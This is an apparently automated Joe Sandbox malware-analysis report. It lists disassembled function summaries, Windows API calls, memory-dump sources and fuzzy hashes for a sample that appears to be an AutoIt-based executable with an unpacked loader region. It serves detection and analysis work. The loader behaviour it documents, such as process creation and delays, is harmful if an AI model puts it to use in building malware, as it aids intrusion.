                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E835A1,SwapMouseButtons,00000004,?), ref: 00E835D4
                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E835A1,SwapMouseButtons,00000004,?,?,?,?,00E82754), ref: 00E835F5
                                        • RegCloseKey.KERNELBASE(00000000,?,?,00E835A1,SwapMouseButtons,00000004,?,?,?,?,00E82754), ref: 00E83617
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Control Panel\Mouse
                                        • API String ID: 3677997916-824357125
                                        • Opcode ID: b10d1f962472697784d22d0166ea4d6c0d41e3761006827f4f20d3b04483c35d
                                        • Instruction ID: 36458b21a69738bc6d173e95aab2c0a6f9f1a949dfdffba8d09865c5d7e5b694
                                        • Opcode Fuzzy Hash: b10d1f962472697784d22d0166ea4d6c0d41e3761006827f4f20d3b04483c35d
                                        • Instruction Fuzzy Hash: D5115A71910208BFDB20DF68DC40DEEBBB8EF04B44F0094A9F809E7210E2719F44A760
                                        APIs
                                          • Part of subcall function 00E85045: _fseek.LIBCMT ref: 00E8505D
                                          • Part of subcall function 00EE99BE: _wcscmp.LIBCMT ref: 00EE9AAE
                                          • Part of subcall function 00EE99BE: _wcscmp.LIBCMT ref: 00EE9AC1
                                        • _free.LIBCMT ref: 00EE992C
                                        • _free.LIBCMT ref: 00EE9933
                                        • _free.LIBCMT ref: 00EE999E
                                          • Part of subcall function 00EA2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA9C64), ref: 00EA2FA9
                                          • Part of subcall function 00EA2F95: GetLastError.KERNEL32(00000000,?,00EA9C64), ref: 00EA2FBB
                                        • _free.LIBCMT ref: 00EE99A6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                        • String ID:
                                        • API String ID: 1552873950-0
                                        • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                        • Instruction ID: ea4051d2605339d775ce102b48eead7a99b5fbd125e60e1b6c71cd2a78341e07
                                        • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                        • Instruction Fuzzy Hash: 585150B1904258AFDF249F65DC81A9EBBB9EF48310F1014AEB60DB7242DB715E80CF58
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                        • String ID:
                                        • API String ID: 2782032738-0
                                        • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                        • Instruction ID: f2d98f6159a405269c80e0fb4edce14eeb9c7456fdb063a4ebb0d4ba02a8c862
                                        • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                        • Instruction Fuzzy Hash: F341E9B06007069BDB188E69C8805AF77A5EFCE354B24917DE855EF6C0E7B0BD508744
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __fread_nolock_memmove
                                        • String ID: EA06
                                        • API String ID: 1988441806-3962188686
                                        • Opcode ID: 39c97bfc987e2714a143be08bc236c9913ca5ffbae4cb049348d50e5040ae9e4
                                        • Instruction ID: 1ec6412506eda772fb85e3a7d6a5c3561ae960bdfd798981584c10baf3da6cdc
                                        • Opcode Fuzzy Hash: 39c97bfc987e2714a143be08bc236c9913ca5ffbae4cb049348d50e5040ae9e4
                                        • Instruction Fuzzy Hash: CA01F9728042586EDB28C7A9C856EEE7BF89B05301F00419AF552E6181E5B9EA048B60
                                        APIs
                                          • Part of subcall function 00EA594C: __FF_MSGBANNER.LIBCMT ref: 00EA5963
                                          • Part of subcall function 00EA594C: __NMSG_WRITE.LIBCMT ref: 00EA596A
                                          • Part of subcall function 00EA594C: RtlAllocateHeap.NTDLL(01150000,00000000,00000001), ref: 00EA598F
                                        • std::exception::exception.LIBCMT ref: 00EA102C
                                        • __CxxThrowException@8.LIBCMT ref: 00EA1041
                                          • Part of subcall function 00EA87DB: RaiseException.KERNEL32(?,?,00000000,00F3BAF8,?,00000001,?,?,?,00EA1046,00000000,00F3BAF8,00E89FEC,00000001), ref: 00EA8830
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                        • String ID: bad allocation
                                        • API String ID: 3902256705-2104205924
                                        • Opcode ID: 9b664631d53d5d000b4a3e34bc94cc34d96a8ce6cc7ce6a84b9fbdc76d8cd9d4
                                        • Instruction ID: 4c13c16042ac4d7acf569ff28d1c1d6cb1565db484a41586216332eee09267dd
                                        • Opcode Fuzzy Hash: 9b664631d53d5d000b4a3e34bc94cc34d96a8ce6cc7ce6a84b9fbdc76d8cd9d4
                                        • Instruction Fuzzy Hash: F3F0283550020DA6CB20BA98ED219DF77EC9F0A390F1010A6FC04FE192DFB0AAD0A2D0
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01190E2D
                                        • ExitProcess.KERNEL32(00000000), ref: 01190E4C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743939760.000000000118F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0118F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_118f000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Process$CreateExit
                                        • String ID: D
                                        • API String ID: 126409537-2746444292
                                        • Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                        • Instruction ID: eb6d52d5b69f149ce647febc9fa1b9788d403f319c58f91277503af7614698a4
                                        • Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                        • Instruction Fuzzy Hash: 1DF0C97154424CABDF64EFE0CC49FEE777CAB08701F408508BA1A9A180DB7496488B61
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00EE9B82
                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00EE9B99
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Temp$FileNamePath
                                        • String ID: aut
                                        • API String ID: 3285503233-3010740371
                                        • Opcode ID: 4a98c16752fc3024537d4b19b4e85ed7adb8a86aad00d27eeb5a3b7e3318a52a
                                        • Instruction ID: 69fee3ace9b388d2077fb09752429a4d6a9f993f6a6101262cc6f2fd1bf658f1
                                        • Opcode Fuzzy Hash: 4a98c16752fc3024537d4b19b4e85ed7adb8a86aad00d27eeb5a3b7e3318a52a
                                        • Instruction Fuzzy Hash: 9BD05E7954030DABDB20DBA0EC0EF9A772CE704700F0042A1BE94910A1DEB0A5989B92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        APIs
                                          • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EA03D3
                                          • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00EA03DB
                                          • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EA03E6
                                          • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EA03F1
                                          • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00EA03F9
                                          • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00EA0401
                                          • Part of subcall function 00E96259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00E962B4
                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E8FB2D
                                        • OleInitialize.OLE32(00000000), ref: 00E8FBAA
                                        • CloseHandle.KERNEL32(00000000), ref: 00EC49F2
                                        Similarity
                                        • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                        • String ID:
                                        • API String ID: 3094916012-0
                                        APIs
                                        • _memset.LIBCMT ref: 00E84401
                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E844A6
                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E844C3
                                        Similarity
                                        • API ID: IconNotifyShell_$_memset
                                        • String ID:
                                        • API String ID: 1505330794-0
                                        APIs
                                        • __FF_MSGBANNER.LIBCMT ref: 00EA5963
                                          • Part of subcall function 00EAA3AB: __NMSG_WRITE.LIBCMT ref: 00EAA3D2
                                          • Part of subcall function 00EAA3AB: __NMSG_WRITE.LIBCMT ref: 00EAA3DC
                                        • __NMSG_WRITE.LIBCMT ref: 00EA596A
                                          • Part of subcall function 00EAA408: GetModuleFileNameW.KERNEL32(00000000,00F443BA,00000104,00000000,00000001,00000000), ref: 00EAA49A
                                          • Part of subcall function 00EAA408: ___crtMessageBoxW.LIBCMT ref: 00EAA548
                                          • Part of subcall function 00EA32DF: ___crtCorExitProcess.LIBCMT ref: 00EA32E5
                                          • Part of subcall function 00EA32DF: ExitProcess.KERNEL32 ref: 00EA32EE
                                          • Part of subcall function 00EA8D68: __getptd_noexit.LIBCMT ref: 00EA8D68
                                        • RtlAllocateHeap.NTDLL(01150000,00000000,00000001), ref: 00EA598F
                                        Similarity
                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                        • String ID:
                                        • API String ID: 1372826849-0
                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00EE97D2,?,?,?,?,?,00000004), ref: 00EE9B45
                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00EE97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00EE9B5B
                                        • CloseHandle.KERNEL32(00000000,?,00EE97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EE9B62
                                        Similarity
                                        • API ID: File$CloseCreateHandleTime
                                        • String ID:
                                        • API String ID: 3397143404-0
                                        APIs
                                        • _free.LIBCMT ref: 00EE8FA5
                                          • Part of subcall function 00EA2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA9C64), ref: 00EA2FA9
                                          • Part of subcall function 00EA2F95: GetLastError.KERNEL32(00000000,?,00EA9C64), ref: 00EA2FBB
                                        • _free.LIBCMT ref: 00EE8FB6
                                        • _free.LIBCMT ref: 00EE8FC8
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        Similarity
                                        • API ID:
                                        • String ID: CALL
                                        • API String ID: 0-4196123274
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: EA06
                                        • API String ID: 4104443479-3962188686
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        APIs
                                        • 745EC8D0.UXTHEME ref: 00E84992
                                          • Part of subcall function 00EA35AC: __lock.LIBCMT ref: 00EA35B2
                                          • Part of subcall function 00EA35AC: RtlDecodePointer.NTDLL(00000001), ref: 00EA35BE
                                          • Part of subcall function 00EA35AC: RtlEncodePointer.NTDLL(?), ref: 00EA35C9
                                          • Part of subcall function 00E84A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E84A73
                                          • Part of subcall function 00E84A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E84A88
                                          • Part of subcall function 00E83B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E83B7A
                                          • Part of subcall function 00E83B4C: IsDebuggerPresent.KERNEL32 ref: 00E83B8C
                                          • Part of subcall function 00E83B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F462F8,00F462E0,?,?), ref: 00E83BFD
                                          • Part of subcall function 00E83B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00E83C81
                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E849D2
                                        Similarity
                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                                        • String ID:
                                        • API String ID: 2688871447-0
                                        Similarity
                                        • API ID: __lock_file_memset
                                        • String ID:
                                        • API String ID: 26237723-0
                                        APIs
                                          • Part of subcall function 00EA8D68: __getptd_noexit.LIBCMT ref: 00EA8D68
                                        • __lock_file.LIBCMT ref: 00EA561B
                                          • Part of subcall function 00EA6E4E: __lock.LIBCMT ref: 00EA6E71
                                        • __fclose_nolock.LIBCMT ref: 00EA5626
                                        Similarity
                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                        • String ID:
                                        • API String ID: 2800547568-0
                                        APIs
                                          • Part of subcall function 011906C8: GetFileAttributesW.KERNELBASE(?), ref: 011906D3
                                        • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01190F99
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743939760.000000000118F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0118F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_118f000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AttributesCreateDirectoryFile
                                        • String ID:
                                        • API String ID: 3401506121-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        APIs
                                          • Part of subcall function 00E84D13: FreeLibrary.KERNEL32(00000000,?), ref: 00E84D4D
                                          • Part of subcall function 00EA548B: __wfsopen.LIBCMT ref: 00EA5496
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E84F6F
                                          • Part of subcall function 00E84CC8: FreeLibrary.KERNEL32(00000000), ref: 00E84D02
                                          • Part of subcall function 00E84DD0: _memmove.LIBCMT ref: 00E84E1A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Library$Free$Load__wfsopen_memmove
                                        • String ID:
                                        • API String ID: 1396898556-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        APIs
                                        • __lock_file.LIBCMT ref: 00EA4AD6
                                          • Part of subcall function 00EA8D68: __getptd_noexit.LIBCMT ref: 00EA8D68
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __getptd_noexit__lock_file
                                        • String ID:
                                        • API String ID: 2597487223-0
                                        APIs
                                        • FreeLibrary.KERNEL32(?,?,00F462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E84FDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        APIs
                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EA09F4
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: LongNamePath_memmove
                                        • String ID:
                                        • API String ID: 2514874351-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __fread_nolock
                                        • String ID:
                                        • API String ID: 2638373210-0
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?), ref: 011906D3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743939760.000000000118F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0118F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_118f000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?), ref: 011906A3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743939760.000000000118F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0118F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_118f000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __wfsopen
                                        • String ID:
                                        • API String ID: 197181222-0
                                        APIs
                                        • Sleep.KERNELBASE(000001F4), ref: 011920A9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743939760.000000000118F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0118F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_118f000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        APIs
                                        • Sleep.KERNELBASE(000001F4), ref: 011920A9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743939760.000000000118F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0118F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_118f000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 00F0CE50
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F0CE91
                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00F0CED6
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F0CF00
                                        • SendMessageW.USER32 ref: 00F0CF29
                                        • _wcsncpy.LIBCMT ref: 00F0CFA1
                                        • GetKeyState.USER32(00000011), ref: 00F0CFC2
                                        • GetKeyState.USER32(00000009), ref: 00F0CFCF
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F0CFE5
                                        • GetKeyState.USER32(00000010), ref: 00F0CFEF
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F0D018
                                        • SendMessageW.USER32 ref: 00F0D03F
                                        • SendMessageW.USER32(?,00001030,?,00F0B602), ref: 00F0D145
                                        • SetCapture.USER32(?), ref: 00F0D177
                                        • ClientToScreen.USER32(?,?), ref: 00F0D1DC
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F0D203
                                        • ReleaseCapture.USER32 ref: 00F0D20E
                                        • GetCursorPos.USER32(?), ref: 00F0D248
                                        • ScreenToClient.USER32(?,?), ref: 00F0D255
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F0D2B1
                                        • SendMessageW.USER32 ref: 00F0D2DF
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F0D31C
                                        • SendMessageW.USER32 ref: 00F0D34B
                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F0D36C
                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F0D37B
                                        • GetCursorPos.USER32(?), ref: 00F0D39B
                                        • ScreenToClient.USER32(?,?), ref: 00F0D3A8
                                        • GetParent.USER32(?), ref: 00F0D3C8
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F0D431
                                        • SendMessageW.USER32 ref: 00F0D462
                                        • ClientToScreen.USER32(?,?), ref: 00F0D4C0
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F0D4F0
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F0D51A
                                        • SendMessageW.USER32 ref: 00F0D53D
                                        • ClientToScreen.USER32(?,?), ref: 00F0D58F
                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F0D5C3
                                          • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F0D65F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
